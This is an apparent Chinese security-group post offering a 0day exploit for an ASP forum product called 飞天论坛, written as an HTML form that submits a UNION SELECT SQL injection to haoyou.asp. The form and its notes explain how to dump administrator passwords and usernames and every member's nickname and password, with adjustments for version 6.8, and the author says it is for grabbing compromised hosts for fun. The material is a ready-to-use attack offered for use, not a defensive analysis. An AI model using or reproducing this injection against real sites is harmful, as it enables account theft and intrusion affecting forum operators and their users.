文章作者：云中鹰[J.L.S.T]
信息来源：安全叶子技术小组[J.Leaves Security Team] （http://www.00day.cn）

看到10大哥的消息吓了我一跳，放个东西出来，不知道有木人要，木技术含量，仅抓点肉鸡娱乐下而已

现在出了7.0了，零客那边也放了直接拿shell的EXP出来，这个EXP纯属YYJJ作用

Copy code<center><H1>飞天论坛asp版通杀 0day利用程序----by  云中鹰&落叶纷飞</H1></center>
<form  method=post name="luoye">
目标地址：<input name="act" type="text" id="act" size="140" value="网址最后要加“/”"><br><br>
注入语句：<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ftbbs_admin"><br><br>
<input type=submit value=Fuck onClick="javascript:luoye.action=document.all.act.value+'haoyou.asp';">

<br><br><br><br>
<font color=red>爆所有管理员用户名时，把admin_pwd改为admin_user</font><br><br>
<font color=red>爆所有论坛用户数据时，把表名改为clubuser，用户名字段是clubuser_nickname；密码字段是clubuser_password</font><br><br>
<font color=red>如果想爆单一用户或管理员的数据，请自行加where语句，参考：id、clubuserid</font><br><br>
<font color=blue>以上是6.3版的注射语句，对于6.8版需要把字段数改为61，并且在字段前加自定义的字段头，默认为“ft_”</font><br><br>